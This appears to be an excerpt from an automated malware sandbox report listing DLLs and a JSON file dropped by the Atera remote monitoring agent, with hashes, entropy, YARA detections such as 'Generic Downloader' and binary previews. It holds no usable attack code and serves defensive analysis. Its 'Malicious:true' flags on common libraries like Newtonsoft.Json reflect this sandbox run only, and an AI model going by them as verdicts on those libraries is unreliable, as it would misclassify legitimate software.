                                                                                                                                                                                                                                                                                              SHA-512:9260472A987BDCEAF5AD26B7164D729558EAE606DB80005AF77F576BB05DA350762CF93B92484BEE4607F7AED853308C49C7BB6AB70D6B0D1E9B30549F4951D9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=$..........." ..0..B..........b`... ........... ..............................[:....`..................................`..O.......4............L..((..........h_..8............................................ ............... ..H............text...h@... ...B.................. ..`.rsrc...4............D..............@..@.reloc...............J..............@..B................A`......H.......Lh................................................................(......}......}.......}.......}........o<...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po ...o....*..{....o/...r...p.(....(....o%...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):75304
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.240181778832263
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:8u2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYn:hF+qo7mDEwj4NXLGcfgruFcaD76ji
                                                                                                                                                                                                                                                                                              MD5:1730F5BE3A1F7BDDC6FA6C2C30F9A507
                                                                                                                                                                                                                                                                                              SHA1:5F96A22803ED258D8174650F872A926F16D9F0E8
                                                                                                                                                                                                                                                                                              SHA-256:F300A241B3E7EF97D43ECA324260E2859F3832C386B4D28B97979FC1FDF32218
                                                                                                                                                                                                                                                                                              SHA-512:19AC925A83EDF979BAE65A2BEF7FCC361535168D761C1D7350094501C149D4C3E21F5BF09652990879887553E6FE282F0B7AE5167CFFA208825244462633AE3B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`............`.....................................O.... ..................((...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.40663982427702
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:uQMnMYPWMXMwtKsSdj3xn91SPSvwzE8Kku6P3A+wf+bnYEpYi60k4jvB:u9MYPJS/16/E8/3A+++bnh76J4jJ
                                                                                                                                                                                                                                                                                              MD5:6FA53D86A203A8F423D5D7031787D033
                                                                                                                                                                                                                                                                                              SHA1:8C30AFC2B99C8B3DE4FE734AB7AE1755A323B354
                                                                                                                                                                                                                                                                                              SHA-256:11939A9A964A1797C037931B39EBBE608FB9EEEED56DFF5D2429BE81B9395E18
                                                                                                                                                                                                                                                                                              SHA-512:0E0E21777A8AC07CD53A6B6674495DF85723C07B99E43D4DA017D6332A114F54B540EEF0861A495DFB102BB201D4F3D7215A79D197D5F46ADBD75C1025F791A5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D............." ..0.............b.... ........... ....................................`.....................................O.......4...............((..........$...T............................................ ............... ..H............text...h.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................B.......H.......|E...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):155176
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.246702749443142
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:60feG0EI+t80zE04kjSnY2QJ6lwZaBsEFmWF+YL4T:TP80zukOltwW2
                                                                                                                                                                                                                                                                                              MD5:9DDEEDCF39F32C55A41DD12DC8961631
                                                                                                                                                                                                                                                                                              SHA1:317A6834BC2B7A6E3766C1B655888BDF0C7B8308
                                                                                                                                                                                                                                                                                              SHA-256:775815C4993544294E44EA83B3C242D72E9E99F7D23AF880C02F4FFE4B74BD56
                                                                                                                                                                                                                                                                                              SHA-512:CC685F7F960113573345FC2E7D1760F9B7A12ED76AC9017692D2AB867572F28281D593CA109F159A0C6AE5F0ACCC12C0F539AB1C5BD83CE9E2A3DA4769CDC70E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%%.W.........." ..0..............M... ...`....... ..............................cO....@.................................lM..O....`...............6..((..........4L............................................... ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............4..............@..B.................M......H.......d....G...........................................................0...........u....,..s....*.........*Z.(....u-...%-.&*o....*..{....*..{....*..{....*..{....*..{....*2.(....._...*2.(....._...*..{....*2.(....._...*...}......}......}.......}.......}.......}.......}....*>.........}....*..{....*...0...........o].....o^...(....%-.&+..o_....(....,...(....o`.....(....oa....(.......(b...,...(.......(c...od...+"(.......(b...,..(.......(c...od....(.......(e...,...(.......(f...og.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.0304720380518
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:q1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7sB:VIzm6pOIgvr70
                                                                                                                                                                                                                                                                                              MD5:EC0868979015D516787FCAA7CA0E5F6E
                                                                                                                                                                                                                                                                                              SHA1:3672A54366D82CE28A5F3A25A6281072B45435E9
                                                                                                                                                                                                                                                                                              SHA-256:70B27423EA7A908015D4F8A40E67EF023C8CB422B1E782D90A105BF1981525EF
                                                                                                                                                                                                                                                                                              SHA-512:E05640786DE1E598A49092B2FCC243129717AE1746D894D2FFF0C54AAAFF12BB4204881373D007B69BFC16F91AACB0C5A29A0E79A6A816191CAA209CB420A66C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ..............................4.....`..................................'..O....@..t............ ..((...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                                                                              SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                                                                              SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                                                                              SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{}

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):354344
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.153318474143049
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:qr/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYl:qhpp9xxIBeXGfvYl
                                                                                                                                                                                                                                                                                              MD5:D423AF5708A85A62D9C2FA2008166E14
                                                                                                                                                                                                                                                                                              SHA1:FA577CBD52F659AACD9E0E06BB38E8ABC77F9120
                                                                                                                                                                                                                                                                                              SHA-256:96A33DBBC0285A0E60E26F72603785CFB3622A0F2018FECFD9DD4C6364D5CBBC
                                                                                                                                                                                                                                                                                              SHA-512:50136E9FB29EF225A5E1BEFA3600A0ED50712E1855EC82D31C69C46914C28A2670F0D04355C9E58397E1AFA486AB7D4FAEAA364B16E8799148C485CC59FCC03B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.Y..........." ..0..8..........nW... ...`....... ....................................`..................................W..O....`...............@..((..........HV..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............>..............@..B................OW......H.......`...ht...................U........................................{*...*..{+...*V.(,.....}*.....}+...*...0..;........u......,/(-....{*....{*...o....,.(/....{+....{+...o0...*.*. S]G. )UU.Z(-....{*...o1...X )UU.Z(/....{+...o2...X*.0...........r...p......%..{*....................-.q.............-.&.+.......o3....%..{+....................-.q.............-.&.+.......o3....(4...*..{5...*..{6...*..{7...*..{8...*..(,.....}5.....}6.....}7......}8...*....0..k........u......,_(-

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071426082550366
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:E1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQB:E1n1p9LdRN39aQZUqI
                                                                                                                                                                                                                                                                                              MD5:758E6813699EE2BC65A6B8AB9DB9878B
                                                                                                                                                                                                                                                                                              SHA1:59F0F0BDA3C83FDCFD11382D7FA7034D3E443403
                                                                                                                                                                                                                                                                                              SHA-256:347085922A13D2C2739ACB9635A46A401C5428E4244720D576317EC252723F92
                                                                                                                                                                                                                                                                                              SHA-512:EC67941EDE60CE6C9E7ADCFFE781D7280597DB5D5D9C1A35B34F9DAFC2B8320C4171FB6018DC5E8186E29A3705C5BB4BF733F61DD0B7332222EE25F669CD43F6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ...............................[....`..................................c..O....................T..((.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960246410031846
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:jBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU0:jBA/ZTvQD0XY0AJBSjRlXP36RMGB
                                                                                                                                                                                                                                                                                              MD5:1A5E0E8E52E3B61AC8E5A022E3C6458B
                                                                                                                                                                                                                                                                                              SHA1:4B8F323732FF25E88DAAE46D0D6CD61B90377E2C
                                                                                                                                                                                                                                                                                              SHA-256:618483C9308B8DF3DD5EE1965A7CBB419DEA32369E0636466DF7FA44AD449668
                                                                                                                                                                                                                                                                                              SHA-512:058F32E1847101A8EB2CDF1A1659214864C776BBE788236C576A94357E262616C755DFE614C2FDC9EE23C38C52E1A77F2EF80DF5B3FEAA954F98C9A2D48D6A4F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......s.....`.....................................O.......................((.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):293416
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.121265926720703
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:2dmT7N9hXNx16L/kakZieD2C6gVkRYKn6nUa9K+yw:2dc7N/WkQHr64w
                                                                                                                                                                                                                                                                                              MD5:3E5ECBD39476F63D84738E0E1C20E168
                                                                                                                                                                                                                                                                                              SHA1:BBD02BD728AC561DEC02CD22C3FF2CB88365BCEA
                                                                                                                                                                                                                                                                                              SHA-256:16A9D6DEE7B4A1100F50D76992D6C8D3846F64A04C1B944AA6C2EE59AD1291F6
                                                                                                                                                                                                                                                                                              SHA-512:9B87988DFC0C78FE2EB5F232E873D49C2F4A3A5F13CC1237CBC1EE16881462352DC0537D3478CE7FED4A43AE3F23FC3559D05A7BC4597B660F73A2A8DD736499
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.d.........." ..0..H..........rb... ........... ..............................xR....`................................. b..O.......$............R..((........................................................... ............... ..H............text....F... ...H.................. ..`.rsrc...$............J..............@..@.reloc...............P..............@..B................Tb......H.......\....V...........................................................0...........(......o......e...%.r...p.s....}......}......}.......}......{......e...%.r...p.s....o....r...po.... ....(.....|....(....-.."....}......{......e...%.r!..p.s....o........(....(....o.....(......(....-...}....*..}....*..{....*..{....*..0..a........{......W..}.....{....,..{.....o.....{.....{......e...%.r!..p.s....o.....{.......(....(....o....*..{....*....0..Z........{......P..}.....{....,..{.....o

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):277032
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190377243156036
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:hSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRlS0:uuQlBAMW0BvltxZ6R
                                                                                                                                                                                                                                                                                              MD5:3BE6CB23581238117B1165B3C7A1E80B
                                                                                                                                                                                                                                                                                              SHA1:ED0AD7C0B685D2ABACEBAC4323CE8CDC5B8029AB
                                                                                                                                                                                                                                                                                              SHA-256:478BFDAD9699E288674A9921CB031DA4B07266FA0F3F43BACAC95184F5B269D5
                                                                                                                                                                                                                                                                                              SHA-512:319720F8DCD45435171CF797C733CF07253F663E8873E7A94B32E6C0D027A9933DE24EBEFF00089540CC98D3DBB2892C8EB53648C641E369A1219A7B8C28577F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............'... ...@....... ....................................@..................................&..O....@..L...............((...`.......%..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................&......H.......L[......................`%......................................^.{....,.(:...z..}.....*^.{....,.(:...z..}.....*"..(?...*"..(@...*...0..,.......sp......}........q...s7...sj....{.....(....*.0..-.......sr......}........s...s7....ss....{.....(....*....0..(.......st......}........u...s7.....{.....(....*.0..'.......sv......}........w...s7...sj.....(....*B...ss.....(....*......(....*.0..'.......sx......}........y...s7...sj.....(....*F...ss......(....*....0..Z..........}....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284200
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.116831406251441
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:cZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHjv:qgo0WPVTXgL
                                                                                                                                                                                                                                                                                              MD5:ACFE625DD1F6644017E798111D264831
                                                                                                                                                                                                                                                                                              SHA1:B2C13E82682293BCE4463D3D2490D021EA0C0859
                                                                                                                                                                                                                                                                                              SHA-256:33F8EA1196916DCE0674793E125F89247AC54168425C5FBF0B4F298145F80BB5
                                                                                                                                                                                                                                                                                              SHA-512:C2EF0A0479705C99F72EF40B21A14075F98BFCD65569467D44B98DF1BCFA1898EC47957F182FCB8F03C80ED396486B06A01920315C1614CCD96CDB080DD8A9C8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ..............................j.....`..................................B..O....`..D...............((...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.676097587903696
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:sy/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOqADi:suhMaVmzDC6k0EpYi60h
                                                                                                                                                                                                                                                                                              MD5:53C97103B34DBD9384E4251F09EB01ED
                                                                                                                                                                                                                                                                                              SHA1:296A0C99DB385D0177102C23161F57E98CC72197
                                                                                                                                                                                                                                                                                              SHA-256:15F176972DEA11A4B76FF0C9FE669E82E3F3D55951FF1DF7BD39B233FFD029CB
                                                                                                                                                                                                                                                                                              SHA-512:611559389187FAF5CF0748B6947600723A14ED9A789B1A236528F41880FDCEB079D721ADA9F2991366544B0E213CD37B67230C3CD723297AC4C111786C890E6B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............((...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):409128
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.097979108391063
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:bPaYZ6henFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchFFc5cbc12:p6heZBJm333M89QAv
                                                                                                                                                                                                                                                                                              MD5:3858D32B6499A109CBB854E1D520B8C6
                                                                                                                                                                                                                                                                                              SHA1:58C3CE821E1099B74904DFD7B34A8D2AF493B5CA
                                                                                                                                                                                                                                                                                              SHA-256:4669C4AFC929FE5DF58B169EBC2463BAC83F867390918B2CA6C21198B3E1B1F8
                                                                                                                                                                                                                                                                                              SHA-512:35E6668F8DCFEFF07C265AA1751274FA4EAB3AEC5643EE526B62244F5662404CE487E7D72822820EDFCBDBA843DE5F406A37F1DE4294960C94B6EF8F153AF5B8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
